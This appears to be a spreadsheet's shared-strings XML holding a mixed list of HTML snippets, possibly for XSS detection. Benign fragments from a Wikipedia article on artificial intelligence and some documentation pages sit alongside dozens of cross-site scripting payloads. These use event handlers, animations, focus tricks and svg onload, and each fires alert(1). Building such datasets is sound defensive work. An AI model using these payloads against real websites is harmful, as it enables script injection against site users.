  </si>
  <si>
    <t>&lt;picture draggable="true" ondragleave="alert(1)"&gt;test&lt;/picture&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;param ondragover=alert(1) contenteditable&gt;drop here&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;col onmouseup="alert(1)"&gt;test&lt;/col&gt;</t>
  </si>
  <si>
    <t>&lt;head onbeforepaste="alert(1)" contenteditable&gt;test&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;output ondblclick="alert(1)"&gt;test&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;keygen style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/keygen&gt;</t>
  </si>
  <si>
    <t>&lt;area ondblclick="alert(1)"&gt;test&lt;/area&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, p.&amp;#160;18 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="Other_sources"&gt;Other sources </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-27"&gt;&lt;a href="#Search_and_optimization"&gt;&lt;span class="tocnumber"&gt;6.1 </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;bdo style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;col style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/col&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;img alt="WikiProject" src="//upload.wikimedia.org/wikipedia/commons/thumb/3/37/People_icon.svg/16px-People_icon.svg.png" decoding="async" title="WikiProject" width="16" height="16" srcset="//upload.wikimedia.org/wikipedia/commons/thumb/3/37/People_icon.svg/24px-People_icon.svg.png 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/3/37/People_icon.svg/32px-People_icon.svg.png 2x" data-file-width="100" data-file-height="100" /&gt;&lt;b&gt;&lt;a href="/wiki/Wikipedia:WikiProject_Computer_science" title="Wikipedia:WikiProject Computer science"&gt;WikiProject &lt;/a&gt; &lt;/b&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;summary onmouseenter="alert(1)"&gt;test&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;q oncopy="alert(1)" contenteditable&gt;test&lt;/q&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">    &lt;div class="rst-footer-buttons" role="navigation" aria-label="footer navigation"&gt;</t>
  </si>
  <si>
    <t>&lt;kbd onbeforecut="alert(1)" contenteditable&gt;test&lt;/kbd&gt;</t>
  </si>
  <si>
    <t>&lt;p onclick="alert(1)"&gt;test&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;multicol onpointerout=alert(1)&gt;XSS&lt;/multicol&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation book"&gt;Ferguson, Sarah; Luders, Brandon; Grande, Robert C.; How, Jonathan P. (2015). &lt;i&gt;Real-Time Predictive Modeling and Robust Avoidance of Pedestrians with Uncertain, Changing Intentions &lt;/i&gt;. &lt;i&gt;Algorithmic Foundations of Robotics XI &lt;/i&gt;. Springer Tracts in Advanced Robotics. &lt;b&gt;107 &lt;/b&gt;. Springer, Cham. pp.&amp;#160;161–177. &lt;a href="/wiki/ArXiv" title="ArXiv"&gt;arXiv &lt;/a&gt;:&lt;span class="cs1-lock-free" title="Freely accessible"&gt;&lt;a rel="nofollow" class="external text" href="//arxiv.org/abs/1405.5581"&gt;1405.5581 &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;tt onmouseleave="alert(1)"&gt;test&lt;/tt&gt;</t>
  </si>
  <si>
    <t>&lt;address oncut="alert(1)" contenteditable&gt;test&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;li onclick="alert(1)"&gt;test&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;dl ondrop=alert(1) contenteditable&gt;drop here&lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;noscript id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;video controls autoplay onended=alert(1)&gt;&lt;source src="validvideo.mp4" type="video/mp4"&gt;&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;input4 onpointerenter=alert(1)&gt;XSS&lt;/input4&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Philosophy_of_space_and_time" title="Philosophy of space and time"&gt;Space and time &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFKurzweil2005"&gt;Kurzweil 2005 &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=The+New+York+Times&amp;amp;rft.atitle=Robots+Will+Take+Jobs%2C+but+Not+as+Fast+as+Some+Fear%2C+New+Report+Says&amp;amp;rft.date=2017&amp;amp;rft.aulast=Lohr&amp;amp;rft.aufirst=Steve&amp;amp;rft_id=https%3A%2F%2Fwww.nytimes.com%2F2017%2F01%2F12%2Ftechnology%2Frobots-will-take-jobs-but-not-as-fast-as-some-fear-new-report-says.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>Artificial Intelligence technologies enable coordination of sensors and effectors, threat detection and identification, marking of enemy positions, target acquisition, coordination and deconfliction of distributed Join Fires between networked combat vehicles and tanks also inside Manned and Unmanned Teams (MUM-T).&lt;sup id="cite_ref-AI_331-1" class="reference"&gt;&lt;a href="#cite_note-AI-331"&gt;&amp;#91;320&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Fuzzy_logic" title="Fuzzy logic"&gt;Fuzzy logic &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;del style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;svg/onload=alert('')&gt;</t>
  </si>
  <si>
    <t>&lt;q id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/q&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound onkeydown="alert(1)" contenteditable&gt;test&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t>Boom of the 1980s: rise of &lt;a href="/wiki/Expert_systems" class="mw-redirect" title="Expert systems"&gt;expert systems &lt;/a&gt;, &lt;a href="/wiki/Fifth_generation_computer" title="Fifth generation computer"&gt;Fifth Generation Project &lt;/a&gt;, &lt;a href="/wiki/Alvey" title="Alvey"&gt;Alvey &lt;/a&gt;, &lt;a href="/wiki/Microelectronics_and_Computer_Technology_Corporation" title="Microelectronics and Computer Technology Corporation"&gt;MCC &lt;/a&gt;, &lt;a href="/wiki/Strategic_Computing_Initiative" title="Strategic Computing Initiative"&gt;SCI &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;tbody id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/tbody&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">  &lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;thead oncopy="alert(1)" contenteditable&gt;test&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;tfoot onmouseenter="alert(1)"&gt;test&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;link id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/link&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-283"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-283"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;meter onkeydown="alert(1)" contenteditable&gt;test&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;ruby onmouseover="alert(1)"&gt;test&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;input onkeydown="alert(1)" contenteditable&gt;test&lt;/input&gt;</t>
  </si>
  <si>
    <t>&lt;audio controls autoplay onended=alert(1)&gt;&lt;source src="validaudio.wav" type="audio/wav"&gt;&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;b onkeypress="alert(1)" contenteditable&gt;test&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;h1 onload=alert(1)&gt;&lt;/h1&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-The_Economist-135"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-The_Economist_135-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-The_Economist_135-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">    ga('require', 'linker');</t>
  </si>
  <si>
    <t>&lt;time onmouseover="alert(1)"&gt;test&lt;/time&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Monism" title="Monism"&gt;Monism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;base id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;object onpointermove=alert(1)&gt;XSS&lt;/object&gt;</t>
  </si>
  <si>
    <t>&amp;#x00003C</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div style="width:52px"&gt;&lt;a href="/wiki/File:Question_book-new.svg" class="image"&gt;&lt;img alt="" src="//upload.wikimedia.org/wikipedia/en/thumb/9/99/Question_book-new.svg/50px-Question_book-new.svg.png" decoding="async" width="50" height="39" srcset="//upload.wikimedia.org/wikipedia/en/thumb/9/99/Question_book-new.svg/75px-Question_book-new.svg.png 1.5x, //upload.wikimedia.org/wikipedia/en/thumb/9/99/Question_book-new.svg/100px-Question_book-new.svg.png 2x" data-file-width="512" data-file-height="399" /&gt; &lt;/a&gt; &lt;/div&gt; &lt;/td&gt;&lt;td class="mbox-text"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation book"&gt;Ivakhnenko, Alexey (1965). &lt;i&gt;Cybernetic Predicting Devices &lt;/i&gt;. Kiev: Naukova Dumka. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Cybernetic+Predicting+Devices&amp;amp;rft.place=Kiev&amp;amp;rft.pub=Naukova+Dumka&amp;amp;rft.date=1965&amp;amp;rft.aulast=Ivakhnenko&amp;amp;rft.aufirst=Alexey&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;i onpointerup=alert(1)&gt;XSS&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Question_answering" title="Question answering"&gt;Question answering &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;abbr onmouseleave="alert(1)"&gt;test&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;i onkeydown="alert(1)" contenteditable&gt;test&lt;/i&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=BBC+News&amp;amp;rft.atitle=Microsoft%27s+Bill+Gates+insists+AI+is+a+threat&amp;amp;rft.date=2015-01-29&amp;amp;rft.aulast=Rawlinson&amp;amp;rft.aufirst=Kevin&amp;amp;rft_id=https%3A%2F%2Fwww.bbc.co.uk%2Fnews%2F31047780&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;template oncontextmenu="alert(1)"&gt;test&lt;/template&gt;</t>
  </si>
  <si>
    <t>&lt;h2&gt;First steps&lt;a class="headerlink" href="#first-steps" title="Permalink to this headline"&gt;¶&lt;/a&gt;&lt;/h2&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=7" title="Edit section: Planning"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/architecture.html"&gt;&lt;span class="doc"&gt;Architecture overview</t>
  </si>
  <si>
    <t>&lt;keygen autofocus onfocusin=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;abbr id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;audio onmouseup="alert(1)"&gt;test&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_ichthyology" title="Glossary of ichthyology"&gt;Ichthyology &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;label onpointerout=alert(1)&gt;XSS&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;rtc id=x tabindex=1 onactivate=alert(1)&gt;&lt;/rtc&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;A key concept from the science of economics is "&lt;a href="/wiki/Utility" title="Utility"&gt;utility &lt;/a&gt;": a measure of how valuable something is to an intelligent agent. Precise mathematical tools have been developed that analyze how an agent can make choices and plan, using &lt;a href="/wiki/Decision_theory" title="Decision theory"&gt;decision theory &lt;/a&gt;, &lt;a href="/wiki/Decision_analysis" title="Decision analysis"&gt;decision analysis &lt;/a&gt;,&lt;sup id="cite_ref-Decisions_theory_and_analysis_213-0" class="reference"&gt;&lt;a href="#cite_note-Decisions_theory_and_analysis-213"&gt;&amp;#91;207&amp;#93; &lt;/a&gt; &lt;/sup&gt; and &lt;a href="/wiki/Applied_information_economics" title="Applied information economics"&gt;information value theory &lt;/a&gt;.&lt;sup id="cite_ref-Information_value_theory_111-1" class="reference"&gt;&lt;a href="#cite_note-Information_value_theory-111"&gt;&amp;#91;108&amp;#93; &lt;/a&gt; &lt;/sup&gt; These tools include models such as &lt;a href="/wiki/Markov_decision_process" title="Markov decision process"&gt;Markov decision processes &lt;/a&gt;,&lt;sup id="cite_ref-Markov_decision_process_214-0" class="reference"&gt;&lt;a href="#cite_note-Markov_decision_process-214"&gt;&amp;#91;208&amp;#93; &lt;/a&gt; &lt;/sup&gt; dynamic &lt;a href="/wiki/Decision_network" class="mw-redirect" title="Decision network"&gt;decision networks &lt;/a&gt;,&lt;sup id="cite_ref-Stochastic_temporal_models_211-2" class="reference"&gt;&lt;a href="#cite_note-Stochastic_temporal_models-211"&gt;&amp;#91;205&amp;#93; &lt;/a&gt; &lt;/sup&gt; &lt;a href="/wiki/Game_theory" title="Game theory"&gt;game theory &lt;/a&gt; and &lt;a href="/wiki/Mechanism_design" title="Mechanism design"&gt;mechanism design &lt;/a&gt;.&lt;sup id="cite_ref-Game_theory_and_mechanism_design_215-0" class="reference"&gt;&lt;a href="#cite_note-Game_theory_and_mechanism_design-215"&gt;&amp;#91;209&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;By the 1980s, progress in symbolic AI seemed to stall and many believed that symbolic systems would never be able to imitate all the processes of human cognition, especially &lt;a href="/wiki/Machine_perception" title="Machine perception"&gt;perception &lt;/a&gt;, &lt;a href="/wiki/Robotics" title="Robotics"&gt;robotics &lt;/a&gt;, &lt;a href="/wiki/Machine_learning" title="Machine learning"&gt;learning &lt;/a&gt; and &lt;a href="/wiki/Pattern_recognition" title="Pattern recognition"&gt;pattern recognition &lt;/a&gt;. A number of researchers began to look into "sub-symbolic" approaches to specific AI problems.&lt;sup id="cite_ref-Symbolic_vs._sub-symbolic_18-1" class="reference"&gt;&lt;a href="#cite_note-Symbolic_vs._sub-symbolic-18"&gt;&amp;#91;18&amp;#93; &lt;/a&gt; &lt;/sup&gt; Sub-symbolic methods manage to approach intelligence without specific representations of knowledge.</t>
  </si>
  <si>
    <t>&lt;col onmouseenter="alert(1)"&gt;test&lt;/col&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-232"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-232"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;section onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/section&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="thumbinner" style="width:222px;"&gt;&lt;a href="/wiki/File:Automated_online_assistant.png" class="image"&gt;&lt;img alt="" src="//upload.wikimedia.org/wikipedia/commons/thumb/8/8b/Automated_online_assistant.png/220px-Automated_online_assistant.png" decoding="async" width="220" height="276" class="thumbimage" srcset="//upload.wikimedia.org/wikipedia/commons/thumb/8/8b/Automated_online_assistant.png/330px-Automated_online_assistant.png 1.5x, //upload.wikimedia.org/wikipedia/commons/8/8b/Automated_online_assistant.png 2x" data-file-width="400" data-file-height="501" /&gt; &lt;/a&gt;  &lt;div class="thumbcaption"&gt;</t>
  </si>
  <si>
    <t>&lt;dl&gt;&lt;dt&gt;&lt;i&gt;The &lt;a href="/wiki/Artificial_brain" title="Artificial brain"&gt;artificial brain &lt;/a&gt; argument &lt;/i&gt; &lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;meter onpointerup=alert(1)&gt;XSS&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;main onkeyup="alert(1)" contenteditable&gt;test&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;code onmousemove="alert(1)"&gt;test&lt;/code&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h4&gt;&lt;span class="mw-headline" id="Embodied_intelligence"&gt;Embodied intelligence </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Operations_research" title="Operations research"&gt;Operations research &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound ondblclick="alert(1)"&gt;test&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;td onload=alert(1)&gt;&lt;/td&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">    &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;input onbeforepaste=alert(1) value="" autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Emergence" title="Emergence"&gt;Emergence &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;select onblur=alert(1) id=x&gt;&lt;/select&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/items.html"&gt;Items&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;In &lt;a href="/wiki/Electronic_discovery" title="Electronic discovery"&gt;Electronic Discovery (eDiscovery) &lt;/a&gt;, the industry has been focused on machine learning (predictive coding/technology assisted review), which is a subset of AI. To add to the soup of applications, Natural Language Processing (NLP) and Automated Speech Recognition (ASR) are also in vogue in the industry.&lt;sup id="cite_ref-328" class="reference"&gt;&lt;a href="#cite_note-328"&gt;&amp;#91;317&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;caption id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/caption&gt;</t>
  </si>
  <si>
    <t>&lt;figure draggable="true" ondragstart="alert(1)"&gt;test&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;param onbeforecut="alert(1)" contenteditable&gt;test&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;dl id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/dl&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=3" title="Edit section: Basics"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;body oncut="alert(1)" contenteditable&gt;test&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFPooleMackworthGoebel1998"&gt;Poole, Mackworth &amp;amp; Goebel 1998 &lt;/a&gt;, pp.&amp;#160;381–394 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=The+Atlantic&amp;amp;rft.atitle=Noam+Chomsky+on+Where+Artificial+Intelligence+Went+Wrong&amp;amp;rft.date=2012-11-01&amp;amp;rft.aulast=Katz&amp;amp;rft.aufirst=Yarden&amp;amp;rft_id=https%3A%2F%2Fwww.theatlantic.com%2Ftechnology%2Farchive%2F2012%2F11%2Fnoam-chomsky-on-where-artificial-intelligence-went-wrong%2F261637%2F%3Fsingle_page%3Dtrue&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Weizenbaum&amp;#39;s_critique-381"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Weizenbaum&amp;#39;s_critique_381-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;dfn id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;ruby style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Kenneth_Cukier" title="Kenneth Cukier"&gt;Cukier, Kenneth &lt;/a&gt;, "Ready for Robots?  How to Think about the Future of AI", &lt;i&gt;&lt;a href="/wiki/Foreign_Affairs" title="Foreign Affairs"&gt;Foreign Affairs &lt;/a&gt; &lt;/i&gt;, vol. 98, no. 4 (July/August 2019), pp.&amp;#160;192–98.  &lt;a href="/wiki/George_Dyson_(science_historian)" title="George Dyson (science historian)"&gt;George Dyson &lt;/a&gt;, historian of computing, writes (in what might be called "Dyson's Law") that "Any system simple enough to be understandable will not be complicated enough to behave intelligently, while any system complicated enough to behave intelligently will be too complicated to understand." (p.&amp;#160;197.)  Computer scientist &lt;a href="/wiki/Alex_Pentland" title="Alex Pentland"&gt;Alex Pentland &lt;/a&gt; writes:  "Current &lt;a href="/wiki/Machine_learning" title="Machine learning"&gt;AI machine-learning &lt;/a&gt; &lt;a href="/wiki/Algorithm" title="Algorithm"&gt;algorithms &lt;/a&gt; are, at their core, dead simple stupid.  They work, but they work by brute force." (p.&amp;#160;198.) &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;xmp onbeforecopy="alert(1)" contenteditable&gt;test&lt;/xmp&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">  &lt;div class="wy-grid-for-nav"&gt;</t>
  </si>
  <si>
    <t>&lt;head draggable="true" ondragenter="alert(1)"&gt;test&lt;/head&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;element ondragover=alert(1) contenteditable&gt;drop here&lt;/element&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;E McGaughey, 'Will Robots Automate Your Job Away? Full Employment, Basic Income, and Economic Democracy' (2018) &lt;a rel="nofollow" class="external text" href="https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3044448"&gt;SSRN, part 2(3) &lt;/a&gt;. &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;isindex onpointerdown=alert(1)&gt;XSS&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;map onmousemove="alert(1)"&gt;test&lt;/map&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="/wiki/Alan_Turing" title="Alan Turing"&gt;Alan Turing &lt;/a&gt; discussed the centrality of learning as early as 1950, in his classic paper "&lt;a href="/wiki/Computing_Machinery_and_Intelligence" title="Computing Machinery and Intelligence"&gt;Computing Machinery and Intelligence &lt;/a&gt;".(&lt;a href="#CITEREFTuring1950"&gt;Turing 1950 &lt;/a&gt;) In 1956, at the original Dartmouth AI summer conference, &lt;a href="/wiki/Ray_Solomonoff" title="Ray Solomonoff"&gt;Ray Solomonoff &lt;/a&gt; wrote a report on unsupervised probabilistic machine learning: "An Inductive Inference Machine".(&lt;a href="#CITEREFSolomonoff1956"&gt;Solomonoff 1956 &lt;/a&gt;) </t>
  </si>
  <si>
    <t>&lt;footer onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/footer&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;param onmouseup="alert(1)"&gt;test&lt;/param&gt;</t>
  </si>
  <si>
    <t>&lt;p class="caption"&gt;&lt;span class="caption-text"&gt;Built-in services</t>
  </si>
  <si>
    <t>&lt;hgroup id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/hgroup&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;head id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;col id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/col&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;/a&gt; &lt;/i&gt;&amp;#93; </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;source ondrop=alert(1) contenteditable&gt;drop here&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;cite onmouseenter="alert(1)"&gt;test&lt;/cite&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-73"&gt;&lt;a href="#AI_textbooks"&gt;&lt;span class="tocnumber"&gt;13.1 </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=BBC+News&amp;amp;rft.atitle=Stephen+Hawking+warns+artificial+intelligence+could+end+mankind&amp;amp;rft.date=2014-12-02&amp;amp;rft.aulast=Cellan-Jones&amp;amp;rft.aufirst=Rory&amp;amp;rft_id=https%3A%2F%2Fwww.bbc.com%2Fnews%2Ftechnology-30290540&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/I._A._Richards" title="I. A. Richards"&gt;I. A. Richards &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFBBC_News2006" class="citation news"&gt;&lt;a rel="nofollow" class="external text" href="http://news.bbc.co.uk/2/hi/technology/6200005.stm"&gt;"Robots could demand legal rights" &lt;/a&gt;. &lt;i&gt;BBC News &lt;/i&gt;. 21 December 2006&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;3 February </t>
  </si>
  <si>
    <t>&lt;bgsound onpointerleave=alert(1)&gt;XSS&lt;/bgsound&gt;</t>
  </si>
  <si>
